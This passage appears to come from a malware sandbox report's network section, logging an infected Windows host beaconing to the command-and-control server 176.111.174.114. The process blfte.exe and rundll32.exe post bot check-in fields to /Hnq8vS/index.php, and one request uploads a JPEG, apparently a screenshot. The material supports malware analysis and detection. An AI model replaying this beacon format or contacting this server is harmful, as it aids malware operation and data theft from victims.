                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          509 | 176.111.174.114 | 80 | 192.168.2.4 | 50056 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:31.947156906 CEST | 12600 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:31 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          51 | 176.111.174.114 | 80 | 192.168.2.4 | 49773 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:18.643534899 CEST | 4546 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:18 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          510 | 192.168.2.4 | 50057 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:32.168560028 CEST | 12601 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          511 | 176.111.174.114 | 80 | 192.168.2.4 | 50057 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:32.274554968 CEST | 12601 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:32 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          512 | 192.168.2.4 | 50058 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:32.494080067 CEST | 12602 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          513 | 176.111.174.114 | 80 | 192.168.2.4 | 50058 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:32.599822044 CEST | 12602 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:32 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          514 | 192.168.2.4 | 50059 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:32.807512045 CEST | 12603 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          515 | 176.111.174.114 | 80 | 192.168.2.4 | 50059 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:32.911221981 CEST | 12603 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:32 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          516 | 192.168.2.4 | 50060 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:33.075798035 CEST | 12617 | OUT | POST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227171
                                                                                                                                          Data Ascii: --152138533219.jpgContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-streamJFIFCC"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzw!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?P/.Rw\5\iGzu{S;/VeOPH<Q+rCOpV0&8"]|J\(I5gmXh(V)j}cxoZ|/{.+<I]n1'"P)y-X&$}*?=&vW>EUEvg_kByYY7;8<\[o]esE?)rvWDK'jnbMND>~4|7u{t.>e_*|o9j"-+*+)OfoV}d8KeCOC?TSWN.)kDX'ZuQkgw-o/nd5pp<olj1;1s<*X|89869e}Ie!V^~*4_no~>K-[R9t/w6_gcmA~r 9qXxJ^w<MNH~@C5|\>;$62>x}<uw5oa?_r3#~?/Oz_W<Cu3V2m yXZW_x[[B$)! zLml[aj3\snV&L3y{NijJ*@79>,?gzWMeYo#'u+$L\A @oO-OU*:N3Z1R_cH^8k,,4;DO|S_s}2`$16T9seb;M_PO''wK`U!cruS|&:n`t)P#DwZZi716ikp|&Tl5CFUeSo+lKJ%y4J+_|GYuYJVsTWU8w]|e*qV8%%uzNkEV~pW^:oN*nQv|XIG(EA{WqGWZLZl*Wtd1NBAWU.G>_9'NvZa2ZJ=xS15$2U=OKt]Bm'WCUayg(~WR)Ttvi[46t6`K}4rm6>cJQsZfV|<9C474$Z9XKzu*U{b8a1HvOah((RQZ];SBzu5e:dQEN5BL3'Z:lW)vQE@w_JJc)=irSN:)i%4}ER?ORQ@u%GXD?k:k$QFhzAS:c679Z*G(*dRTt(((@QE@q'vK(dMzoz6(;RIfh((-R?W$:~4*}Y;R'f1>>((v$GAZy4-JP'ZPvU"e<ayk=h8'li_1xO.t&sv%^dz|D<OHOr;Y.VD8ud|7~g=|C)$(38Ri)J9Ji?yD2!g'YB7^tz{ii2N]RYoLU|wtzyK$c\N+#[?pbd ,mp3g+zE,VUVMuM;4}4S~x['VaQ`v1ER1'+!_EdK& [;R%s:{"z7M<zY:H+9nm58?}W\^ip]{NbL\gyVqff|Q(X.pJS<B>;(U:L*QnVO]5?Q!a(Gz'WIXQI9Ez#B MJ5OJsK+{^'_[> x7:yke]hxj?>xXeZ'<|Mxn/L^%z4:3<>LYU;3/<Z/b>c^YIl2bK<ueAUtQT7+siqpWtY+SI&zz47~]vv^i~-:_&[K6B{?)*/4BK;x%_5YEq>6EHD4Z?Zz}]$-u`rT_RY51tO%p8-Sm\jsm]_su_U:*qp~ROp((q~n#s'//4V&6w*M3< +{Hz?T|Jo{}?L~xVP_@&lm*u1M5{6(vJJxzqSRNJISkmrz&Q_:L.h:v/-u7QgBLs??k}gt47+oRiPc$4m;c;_Wx7A>C%u534d`osV VIu,f_7VeevK+IgYfyAUsp_M]'N\uo8_?v[~'44Y&h#.~NrN?]/K:u0+KhkR4(VZ,Lh0[]G->O:>W?:3XeKIgp8KKgh_o~~'wh7q"\M-TZ2R9FX)mo(KT~;Eo,n]mL#V~%|%mOx,=:|jsy#s.[-SS%Q\E6wsEW4z>!nt{L$S#H$x 
?i7m'Px;JKOkWcqa7q4Fq?iK/P3]iVb.2Y@#$P9FWIupo3=*r:rT7N1J.:+E-X~SwB.oXyq"_.y~e}P?b|+-kKGZu<C("mr18DW\S<{3oir**G/T.aTe^D*]!l>_M@]ThJZQEaEU$)(Q@QUvi@%GN:}}5:6V}0;ROOiN*Xrz$H(jb=eL3!6qQId6t}RP)#tb"R1]%JoK((MdMOSRQQ"M%Sq+DM9CI>%:>I@QAQEQEaA?[QE@Q@_X}GiNUISHSdHzNt0;$UjM<zRy#E5Wu%*}XKOOs"?/zU]WtN.f}Ph?|2O2Gq\{y_wxs64-c4STc(W!@lO5xC.ej,pZJ;*'+%#osW|:yH5W^QMTURVm+=LjrQRHFjqwI?ox&d!X^-8>^x^/goTu=Y?n_r?#_?\2EQVY%ov='eU,-j+$7M&<J&qLX_I_ghCig&{4}o/w2vy*Ky@5H;6x^z2zWs3wSahz\t[BGRC|c_2Jcl<YW_'3w(`*?yB.N>1RV0RZsI+]G:3#cW%x""'%'iO2tvGJ+pV1R6(j>4|@>$tzMn]L'8I;A><]VJPnTMSF'5%dm_Jru?*Gg[~CWG'jH!k)DjVL?Zz?SR.^6uQ_&|?0\hZk,t-$UH]|VTk^&<]u-6u,y x7"#r?cq5/gtA?@_9<+mZ/k[@-b'NsM],2'=x?5YS7+@SAms&[u9UKe:7_x7[[Kn;H%b03?+>=<8;x{;I>i6m;$'/2PJM4X6R4jx"OgQNi@_/I3O_]>>TFwm~Y:2t{!GoI<#~L?_<aCOPRikiX=\99S*;s{IWd0sG5mi+]Scoqqgq8x09 ~nx[?l;1"D/Yx.}o_?s_W_c|Q0<x=c%iE;'n>/ArE2VQwW|9s|=tJuzv<;ss6U4D!UU.U$*tV"zU$GB)qO+2///k!#>2xHxJ#j_X'c5%qfe{'/t55]+[fa]{0GO&?g[|IErG]#EAMlFAy\33?SdB|:~|6K}]:OqZ"B"k$nQcWW\=iUtZt?N.L-*,ndj-)&>UN,avAv1iM6 HmWa_[C^_4M~_X6R.t6[H&f^%pv$i,`}28b"\+>NK_srC!:\t#c&n1_W9S/7A#1oL*x5ARy~73ul4KLzmNfcN~)_#Ry($(QN_w>#KXhx/e%7}HDAZ6j"&9QE;co3.$-PD'Zu6>:>*DNdM*H?ZD)=*V]K8O|P?yA};!|/)\heIR5~S>qQ4DO&NvXH;vYs2:MRl(2 OeI6'j'j$=HiEH)vDi67>P#'j0E<C.y.9'O(%GRhQEQEfEPQ`(S_:czRQ@)(t}S@Q@S-QEaEPEPEP$F'?ZOoCNu^4<sW[,r["jn_i+sm?Iu3{Fo>qo~|Zy#z/>/rB) e8j,k.t/pY=gWa0xqJXsP!!mMi$OQO|[/~;RxBd hc ,UX)<Vd}Z}>[Y'%YrTdyB#]tw}s1*o}lC/Wuwe;VAniduOD;||w_+)W[[I-i\[B\ocUK~Ow0uM";g\GHBMpk_b+M_WxlL{gZiwjp?5|Y<#;76<OaiW\$*@O5wd8Bis^m,k2_^~1,ibVs.g$X&|Z,o!q_s%vs$P$ljUF0j*\4z6mYn;c^IW4U{%:o&pxi^=oBq( |JVmm~^qsk6OM<LwNC|dhrZxzmT/si}{y,YEmt$yOE)e8jY_EF3Ii~YJo\Z$ub!J0.TOJIul+LO^~ZuihC|qVXAuY}-KMH%n!h">WS~oxN4<v,K"/lZY4V-eMpy+}tQJM;j1;+&MYkt3(a-?Gxti+hWR}:'Z<ER>U>xCZ-q'](jYG60,HfM5MsI+mnTe3X\r(6+{k>h2ozxcW> *mo#]om`m5_|1X|sWw^H$s5UKQ!Uj4Ta&6VZoo'q*UDVu?{U<DhNwyAbH"_f%2|62'cQ|1dz^xzsk:O-k!PX4+Hc#"S['4\<!])mD^[G%dX. 
JFcwwzN&UdZW,cv/MWW[4x?FCc:~u |[K0?<m!xjo-R{!YmvYgk~$7.$YqusoalQTdPm5KhRZ3qR;4>o<K=_)7)1qMu+Ntp@rr<s"e]>|9au'vB+~|KcetG9[R_7M-%k>4ceZt(Cj1,YO(}wqZkgW5HVI^fu}]fy#zWkOx{V1=]j0^-\[LK+#%Q&VO>xW_#d]2IId'cu/++vw\YJik3Ag,>xks{z^l,./$O16`Gls?/l5>2?+/cxK-.}vCvMcKbERUcJR~k}~WmVQ6w9c/(5jI0Gq'UP\>?x?g?5_'gGsH<'KJ}^\Eo6riR`bQHFkuN6xS]c[\4hjUHJA >N6Q'JMJIk"Wm-zIv}"_3aoM?x%3'_Ww5[xtok4Iv-\K24i2$}8t9~,<;Y<Es3ko5YURdq6wVJ:jw}U|-no]_So)9K/~>>3^QT{%ImRHf9 cGW|9(T)-!H>dkZQ*n%EFNo_/:X~w;iE{H.nI)<_*+E+YUHrn1ktkZ?u+gS5]q.n]B9,YgPW,<&
                                                                                                                                          Apr 28, 2021 23:00:33.170495987 CEST12620OUTData Raw: 56 ff 00 77 14 95 00 2a 7d ea 7d 31 3a d3 eb 40 1e 9f 76 9f 1f 7a 8e 3e f4 ea b8 99 92 a7 5a 97 9d 95 5e 3e f5 35 6a 65 2d 87 47 de 9d 51 d3 93 ad 04 0e a2 91 fa 7e 34 b4 e3 f1 00 53 bf e5 9d 1f f2 ce 97 e7 f6 ad cc c4 fd e5 07 7f ff 00 aa 9d 45
                                                                                                                                          Data Ascii: Vw*}}1:@vz>Z^>5je-GQ~4SE7YihL=Z(cD2G.|e"0?Z%@rbORg8\~)*JF0s~NJP#E?ftmG*/+R<M*mczT<z?ZM1(+I
                                                                                                                                          Apr 28, 2021 23:00:33.171531916 CEST12623OUTData Raw: a9 4b 76 b5 94 15 3e 9b 28 c5 7b b6 d6 2f 67 d0 fa 03 51 bf fd 90 bf 6a ef 86 7f 0c b4 ff 00 1b fe d0 f6 df 08 ff 00 e1 56 58 ea 1e 1c bd d1 3c 49 a0 6a fa a4 fa 9f 87 df 58 bc d4 ed 27 d3 0d 8d b5 c4 4f 7c a9 7d 71 04 90 dd cb 69 11 78 a0 61 3e
                                                                                                                                          Data Ascii: Kv>({/gQjVX<IjX'O|}qixa>$|y=|K^>a?i={i6A&4e"$x;[u|Dz58AYRUwvvJ8.JJ2m]KO_Oe'tc
                                                                                                                                          Apr 28, 2021 23:00:33.171588898 CEST12631OUTData Raw: bf e5 4d aa 33 1d 27 6a 75 36 3e f4 49 da 80 1b 49 dd 69 68 dd b7 9c d4 cb 73 40 a9 2a 20 db b9 a7 c7 de 88 93 22 54 fb b4 b5 14 5f eb 2a 5a a3 39 08 ff 00 76 99 4f 7f bb 4c a0 71 d8 8e 9c 9d 68 e7 7d 23 fd ea 06 0c db a9 63 ef 44 9d a8 93 b5 00
                                                                                                                                          Data Ascii: M3'ju6>IIihs@* "T_*Z9vOLqh}#cD"}}GRPM:'jmMz>>%zi}uOA.:QA$s)|jQc6#$S]h4y"n1KTGg_T.r/Nb:)
                                                                                                                                          Apr 28, 2021 23:00:33.171628952 CEST12639OUTData Raw: e2 a9 aa 7b ab 6e a5 7e 6e 6d 57 c4 a5 ef 5d f5 dc fe 6a 87 0d f8 93 1c d1 63 de 16 a3 a9 6b 3b db 58 db 97 97 47 f0 b8 fb b6 5d 0f 42 ff 00 82 6c fe d8 5e 29 f1 cf 8e 3e 15 fe c6 9f 16 16 69 7c 47 e0 0f 88 17 cf a5 5e 16 f3 37 e9 d0 f8 7b 5b 81
                                                                                                                                          Data Ascii: {n~nmW]jck;XG]Bl^)>i|G^7{[w$h4l$mG?VW'zC?XxS_"InuKnXKaqmELg:8O!-8Lq7JTeNg\C>Jy%8(AF
                                                                                                                                          Apr 28, 2021 23:00:33.171684980 CEST12642OUTData Raw: cb d6 a6 65 db de 92 a3 94 d3 98 87 ca 7f 4a 6b c7 dc d4 df bc a6 49 bf 15 9f 29 5c c4 5b 0d 35 e3 f5 a9 28 a9 2f 99 11 79 5e c6 a5 55 fd de 4d 15 22 8f dd e6 a7 94 52 91 03 47 f8 d4 7e 57 b0 ab 2b 1f ad 12 0c 35 69 ca 38 c8 a3 24 7f 35 15 34 d1
                                                                                                                                          Data Ascii: eJkI)\[5(/y^UM"RG~W+5i8$546zM"iyNR0'j^THSh~+GKDLU1sl_J6/KQaex{]vc?izVzuWj;f}jz~3#mn;{Ql-*e
                                                                                                                                          Apr 28, 2021 23:00:33.172113895 CEST12644OUTData Raw: dd b2 5c c1 20 0f 04 92 5b 4b 14 c1 1c 06 d9 2a 31 00 32 93 e3 5f f0 9c 7c 4d 1f 0b 9f e0 62 7c 56 f1 30 f0 34 9a bf f6 ac 9e 0b 1a ed c7 f6 53 5f ec 09 f6 b3 69 bf c9 33 6d 01 7c cd 9b b0 31 9c 56 35 96 95 65 a7 92 6d a2 c1 3d ea e3 94 e2 e7 98
                                                                                                                                          Data Ascii: \ [K*12_|Mb|V04S_i3m|1V5em=9$je5\zI]yMJJ%ed(~wS#x2~'kk)uI4J$k}sx]MV70Q]~N[<|u
                                                                                                                                          Apr 28, 2021 23:00:33.263833046 CEST12648OUTData Raw: cf e6 5e 9c f1 56 25 d3 a5 85 80 09 9c 74 15 ea 65 b9 46 2b 01 5a ac e7 3b a9 b6 d2 e8 9b 94 a4 ff 00 f4 a5 1d 2d a4 57 5b b7 e5 e3 b3 4c 2e 36 95 38 42 3a c5 5a ef 76 94 63 15 eb f0 f3 36 fe d4 a5 b2 b2 55 e9 b1 f7 a9 9a de 6e a5 29 16 37 cf dc
                                                                                                                                          Data Ascii: ^V%teF+Z;-W[L.68B:Zvc6Un)7[yTZ?Z>\rJTMt}^S.a?H*Ty;rAOXjjXB*~etrs]P7JY#o:`3"U&9/)<9/SRy^h#
                                                                                                                                          Apr 28, 2021 23:00:33.263870955 CEST12650OUTData Raw: ee 51 ac 64 45 72 eb 2c 48 01 2e ac 31 87 3d bd 39 a3 01 97 d6 cc 31 70 c3 d2 f8 a4 ec af a0 f1 f8 ea 19 6e 0e 78 aa df 04 15 dd b5 38 08 bf ad 39 3e f5 7d 4f ff 00 0c 3f f0 9f fe 86 1f 11 7f e0 5c 1f fc 66 81 fb 10 7c 28 5e 9e 20 f1 0f fe 05 c1
                                                                                                                                          Data Ascii: QdEr,H.1=91pnx89>}O?\f|(^ kq>3"O4|E}J?b?#c!?#R?>?e_>W;W_`kg_"M<7j>+9AqeIk(
                                                                                                                                          Apr 28, 2021 23:00:33.264818907 CEST12653OUTData Raw: a7 09 3d 0d fd 36 5e 80 57 f2 c3 ff 00 05 0e 55 5f db fb e3 9a a2 80 07 c6 1f 13 00 00 e0 0f ed 5b 9a fe a5 74 a9 72 06 6b f9 6a ff 00 82 87 73 fb 7f 7c 72 3f f5 58 7c 4d ff 00 a7 5b 9a fd bb e8 f1 2b e6 f8 df fa f7 1f fd 28 fc f3 c4 c5 6c 1d 0f
                                                                                                                                          Data Ascii: =6^WU_[trkjs|r?X|M[+(l?ruIz?HD-v3q_i_5]_H,0UEI$x<FT{ygnp=OUj"'RXiPrcmxH
                                                                                                                                          Apr 28, 2021 23:00:33.264888048 CEST12671OUTData Raw: 62 e1 7d 54 d7 e6 bf 51 f0 7b ea 4a b7 d6 71 3c f6 f8 3d de 6b f6 bf b3 e4 f9 f3 58 fd 2b eb de 30 fd 75 d1 fa b6 1b 91 3f 8f de e5 b7 7b 7b 5e 7f 97 2d cf 86 7f e0 af 5f b4 a7 c1 af da a7 f6 a6 b2 f8 95 f0 33 c5 6f ac e8 d0 f8 3e d2 c6 4b b7 d3
                                                                                                                                          Data Ascii: b}TQ{Jq<=kX+0u?{{^-_3o>K"tvN,ss_'m;(E{5xqNq_Wx"n+7d%#&1RWINNft]x?Xvb:)W^zjsKCjr


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
517 | 192.168.2.4 | 50061 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:33.112050056 CEST | 12617 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
518 | 176.111.174.114 | 80 | 192.168.2.4 | 50061 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:33.208590031 CEST | 12645 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:33 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
519 | 192.168.2.4 | 50062 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:33.413007021 CEST | 12805 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
52 | 192.168.2.4 | 49774 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:18.865421057 CEST | 4547 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
520 | 176.111.174.114 | 80 | 192.168.2.4 | 50062 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:33.516582012 CEST | 12832 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:33 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
521 | 176.111.174.114 | 80 | 192.168.2.4 | 50060 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:33.550051928 CEST | 12833 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:33 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
522 | 192.168.2.4 | 50063 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:33.727392912 CEST | 12834 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
